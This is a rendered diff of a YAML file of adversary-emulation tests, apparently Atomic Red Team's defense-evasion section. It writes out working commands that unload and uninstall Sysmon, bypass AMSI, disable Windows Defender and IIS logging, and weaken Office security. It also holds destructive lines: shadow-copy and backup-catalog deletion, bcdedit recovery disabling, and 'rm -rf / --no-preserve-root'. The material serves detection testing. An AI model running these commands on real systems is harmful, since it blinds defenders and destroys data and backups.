|
|
dependencies:
|
|
|
|
|
- description: Sysmon filter must be loaded
|
|
|
|
|
prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver}'
|
|
|
|
|
get_prereq_command: echo Automated installer not implemented yet, please install
|
|
|
|
|
Sysmon manually
|
|
|
|
|
- description: Sysmon must be downloaded
|
|
|
|
|
prereq_command: if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon
|
|
|
|
|
2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else {
|
|
|
|
|
exit 1 }
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
|
|
|
|
|
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
|
|
|
|
|
Remove-Item $env:TEMP\Sysmon.zip -Force
|
|
|
|
|
- description: sysmon must be Installed
|
|
|
|
|
prereq_command: if(sc.exe query sysmon | findstr sysmon) { exit 0 } else {
|
|
|
|
|
exit 1 }
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
|
|
|
|
|
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
|
|
|
|
|
- description: sysmon filter must be loaded
|
|
|
|
|
prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0
|
|
|
|
|
} else { exit 1 }'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
sysmon -u
|
|
|
|
|
sysmon -accepteula -i
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
command: 'fltmc.exe unload #{sysmon_driver}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
sc stop sysmon
|
|
|
|
|
fltmc.exe load #{sysmon_driver}
|
|
|
|
|
sc start sysmon
|
|
|
|
|
sysmon -u -i > nul 2>&1
|
|
|
|
|
sysmon -i -accepteula -i > nul 2>&1
|
|
|
|
|
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
|
|
|
|
|
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
|
|
|
|
|
- name: Disable Windows IIS HTTP Logging
|
|
|
|
|
description: |
|
|
|
|
|
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
|
|
|
|
@@ -6962,19 +7010,19 @@ defense-evasion:
|
|
|
|
|
prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit
|
|
|
|
|
0} else {exit 1}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
|
|
|
|
|
/section:httplogging /dontLog:true
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
|
|
|
|
|
/section:httplogging /dontLog:false
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Uninstall Sysmon
|
|
|
|
|
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7001,10 +7049,10 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sysmon -u
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sysmon -i -accepteula
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: AMSI Bypass - AMSI InitFailed
|
|
|
|
|
description: |
|
|
|
|
|
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
|
|
|
|
@@ -7028,16 +7076,16 @@ defense-evasion:
|
|
|
|
|
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
|
|
|
|
|
-Recurse
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
|
|
|
|
|
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable Arbitrary Security Windows Service
|
|
|
|
|
description: 'With administrative rights, an adversary can disable Windows Services
|
|
|
|
|
related to security products.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7086,12 +7134,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Tamper with Windows Defender ATP PowerShell
|
|
|
|
|
description: 'Attempting to disable scheduled scanning and other parts of windows
|
|
|
|
|
defender atp
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
|
|
|
|
|
in Windows settings.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -7108,10 +7155,9 @@ defense-evasion:
|
|
|
|
|
Set-MpPreference -DisableScriptScanning 0
|
|
|
|
|
Set-MpPreference -DisableBlockAtFirstSeen 0
|
|
|
|
|
- name: Tamper with Windows Defender Command Prompt
|
|
|
|
|
description: 'Attempting to disable scheduled scanning and other parts of windows
|
|
|
|
|
defender atp
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
|
|
|
|
|
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -7125,9 +7171,9 @@ defense-evasion:
|
|
|
|
|
sc start WinDefend
|
|
|
|
|
sc config WinDefend start=enabled
|
|
|
|
|
- name: Tamper with Windows Defender Registry
|
|
|
|
|
description: 'Disable Windows Defender from starting after a reboot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
|
|
|
|
|
grayed out and have no info.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -7136,14 +7182,17 @@ defense-evasion:
|
|
|
|
|
command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
|
|
|
|
|
-Name DisableAntiSpyware -Value 1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
|
|
|
|
|
Defender" -Name DisableAntiSpyware -Value 0
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Disable Microft Office Security Features
|
|
|
|
|
description: |
|
|
|
|
|
Gorgon group may disable Office security features so that their code can run
|
|
|
|
|
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
|
|
|
|
|
show any warning before editing the document
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
@@ -7163,8 +7212,10 @@ defense-evasion:
|
|
|
|
|
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
|
|
|
|
|
- name: Remove Windows Defender Definition Files
|
|
|
|
|
description: |
|
|
|
|
|
Removing definition files would cause ATP to not fire for AntiMalware
|
|
|
|
|
Check MpCmdRun.exe man page for info on all arguments
|
|
|
|
|
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
|
|
|
|
|
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
|
|
|
|
|
command will say completed.
|
|
|
|
|
|
|
|
|
|
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
@@ -7174,7 +7225,7 @@ defense-evasion:
|
|
|
|
|
command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
|
|
|
|
|
-All
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1107:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -7230,7 +7281,7 @@ defense-evasion:
|
|
|
|
|
- name: Delete a single file - Linux/macOS
|
|
|
|
|
description: 'Delete a single file from the temporary directory
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -7243,12 +7294,12 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'rm -f #{file_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete an entire folder - Linux/macOS
|
|
|
|
|
description: 'Recursively delete the temporary directory and all files contained
|
|
|
|
|
within it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -7261,12 +7312,12 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'rm -rf #{folder_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Overwrite and delete a file with shred
|
|
|
|
|
description: 'Use the `shred` command to overwrite the temporary file and then
|
|
|
|
|
delete it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7278,123 +7329,122 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'shred -u #{file_to_shred}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete a single file - Windows cmd
|
|
|
|
|
description: 'Delete a single file from the temporary directory using cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Delete a single file from the temporary directory using cmd.exe.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_delete:
|
|
|
|
|
description: File to delete. Run the prereq command to create it if it does
|
|
|
|
|
not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\deleteme_T1107"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file to delete must exist on disk at specified location (#{file_to_delete})
|
|
|
|
|
prereq_command: IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
|
|
|
|
|
get_prereq_command: 'echo deleteme_T1107 >> #{file_to_delete}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo "T1107" > %temp%\T1107.txt
|
|
|
|
|
del /f %temp%\T1107.txt >nul 2>&1
|
|
|
|
|
command: 'del /f #{file_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete an entire folder - Windows cmd
|
|
|
|
|
description: 'Recursively delete the temporary directory and all files contained
|
|
|
|
|
within it using cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Recursively delete a folder in the temporary directory using cmd.exe.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
folder_to_delete:
|
|
|
|
|
description: Folder to delete. Run the prereq command to create it if it
|
|
|
|
|
does not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\deleteme_T1107"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file to delete must exist on disk at specified location (#{folder_to_delete})
|
|
|
|
|
prereq_command: IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
|
|
|
|
|
get_prereq_command: 'mkdir #{folder_to_delete}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
mkdir %temp%\T1107
|
|
|
|
|
rmdir /s /q %temp%\T1107
|
|
|
|
|
command: 'rmdir /s /q #{folder_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete a single file - Windows PowerShell
|
|
|
|
|
description: 'Delete a single file from the temporary directory using Powershell
|
|
|
|
|
description: 'Delete a single file from the temporary directory using Powershell.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the
|
|
|
|
|
file was deleted.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_delete:
|
|
|
|
|
description: File to delete. Run the prereq command to create it if it does
|
|
|
|
|
not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "$env:TEMP\\deleteme_T1107"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file to delete must exist on disk at specified location (#{file_to_delete})
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item $env:TEMP\T1107.txt
|
|
|
|
|
Remove-Item -path $env:TEMP\T1107.txt
|
|
|
|
|
command: 'Remove-Item -path #{file_to_delete}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete an entire folder - Windows PowerShell
|
|
|
|
|
description: 'Recursively delete the temporary directory and all files contained
|
|
|
|
|
within it using Powershell
|
|
|
|
|
description: 'Recursively delete a folder in the temporary directory using Powershell.
|
|
|
|
|
Upon execution, no output will be displayed. Use File Explorer to verify the
|
|
|
|
|
folder was deleted.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
folder_to_delete:
|
|
|
|
|
description: Folder to delete. Run the prereq command to create it if it
|
|
|
|
|
does not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "$env:TEMP\\deleteme_folder_T1107"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The folder to delete must exist on disk at specified location
|
|
|
|
|
(#{folder_to_delete})
|
|
|
|
|
prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory |
|
|
|
|
|
Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
New-Item $env:TEMP\T1107 -ItemType Directory
|
|
|
|
|
Remove-Item -path $env:TEMP\T1107 -recurse
|
|
|
|
|
- name: Delete VSS - vssadmin
|
|
|
|
|
description: 'Delete all volume shadow copies with vssadmin.exe
|
|
|
|
|
command: 'Remove-Item -Path #{folder_to_delete} -Recurse
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe Delete Shadows /All /Quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Delete VSS - wmic
|
|
|
|
|
description: 'Delete all volume shadow copies with wmic
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wmic shadowcopy delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: bcdedit
|
|
|
|
|
description: 'This test leverages `bcdedit` to remove boot-time recovery measures.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
bcdedit /set {default} bootstatuspolicy ignoreallfailures
|
|
|
|
|
bcdedit /set {default} recoveryenabled no
|
|
|
|
|
- name: wbadmin
|
|
|
|
|
description: 'This test deletes Windows Backup catalogs.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wbadmin delete catalog -quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete Filesystem - Linux
|
|
|
|
|
description: 'This test deletes the entire root filesystem of a Linux system.
|
|
|
|
|
This technique was used by Amnesia IoT malware to avoid analysis. This test
|
|
|
|
|
is dangerous and destructive, do NOT use on production equipment.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete-PrefetchFile
|
|
|
|
|
description: 'Delete a single prefetch file. Deletion of prefetch files is
|
|
|
|
|
a known anti-forensic technique.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
|
|
|
|
|
before and after the test to verify that the number of prefetch files decreases by 1.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -7403,27 +7453,35 @@ defense-evasion:
|
|
|
|
|
command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
|
|
|
|
|
-Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete TeamViewer Log Files
|
|
|
|
|
description: |
|
|
|
|
|
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
|
|
|
|
|
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
|
|
|
|
|
log file format of TeamViewerXX_Logfile.log
|
|
|
|
|
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
|
|
|
|
|
|
|
|
|
|
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
|
teamviewer_log_file:
|
|
|
|
|
description: Teamviewer log file to delete. Run the prereq command to create
|
|
|
|
|
it if it does not exist.
|
|
|
|
|
type: string
|
|
|
|
|
default: "$env:TEMP\\TeamViewer_54.log"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The folder to delete must exist on disk at specified location
|
|
|
|
|
(#{teamviewer_log_file})
|
|
|
|
|
prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit
|
|
|
|
|
1}'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
if ($env:os -eq "Windows_NT") {
|
|
|
|
|
New-Item $env:TEMP\TeamViewer_54.log
|
|
|
|
|
Remove-Item $env:TEMP\TeamViewer_54.log
|
|
|
|
|
} else {
|
|
|
|
|
New-Item $env:HOME\TeamViewer_54.log
|
|
|
|
|
Remove-Item $env:HOME\TeamViewer_54.log
|
|
|
|
|
}
|
|
|
|
|
command: 'Remove-Item #{teamviewer_log_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
T1222:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -7522,7 +7580,7 @@ defense-evasion:
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified file or folder
|
|
|
|
|
to take ownership of the object.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7534,12 +7592,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'takeown.exe /f #{file_folder_to_own}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Take ownership recursively using takeown utility
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified folder to
|
|
|
|
|
take ownership of it and its contents.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7551,12 +7609,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'takeown.exe /f #{folder_to_own} /r
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: cacls - Grant permission to specified user or group
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified file or folder
|
|
|
|
|
to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7572,12 +7630,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: cacls - Grant permission to specified user or group recursively
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified folder and
|
|
|
|
|
contents to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7593,12 +7651,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: icacls - Grant permission to specified user or group
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified file or folder
|
|
|
|
|
to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7614,12 +7672,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: icacls - Grant permission to specified user or group recursively
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified folder and
|
|
|
|
|
contents to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7635,12 +7693,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: attrib - Remove read-only attribute
|
|
|
|
|
description: 'Removes the read-only attribute from a file or folder using the
|
|
|
|
|
attrib.exe command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7652,12 +7710,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'attrib.exe -r #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (numeric mode)
|
|
|
|
|
description: 'Changes a file or folder''s permissions using chmod and a specified
|
|
|
|
|
numeric mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7674,12 +7732,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{numeric_mode} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (symbolic mode)
|
|
|
|
|
description: 'Changes a file or folder''s permissions using chmod and a specified
|
|
|
|
|
symbolic mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7696,12 +7754,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{symbolic_mode} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (numeric mode) recursively
|
|
|
|
|
description: 'Changes a file or folder''s permissions recursively using chmod
|
|
|
|
|
and a specified numeric mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7718,12 +7776,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{numeric_mode} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (symbolic mode) recursively
|
|
|
|
|
description: 'Changes a file or folder''s permissions recursively using chmod
|
|
|
|
|
and a specified symbolic mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7740,12 +7798,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{symbolic_mode} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder ownership and group
|
|
|
|
|
description: 'Changes a file or folder''s ownership and group information using
|
|
|
|
|
chown.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7766,12 +7824,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner}:#{group} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder ownership and group recursively
|
|
|
|
|
description: 'Changes a file or folder''s ownership and group information recursively
|
|
|
|
|
using chown.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7792,11 +7850,11 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner}:#{group} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder mode ownership only
|
|
|
|
|
description: 'Changes a file or folder''s ownership only using chown.
|
|
|
|
|
|
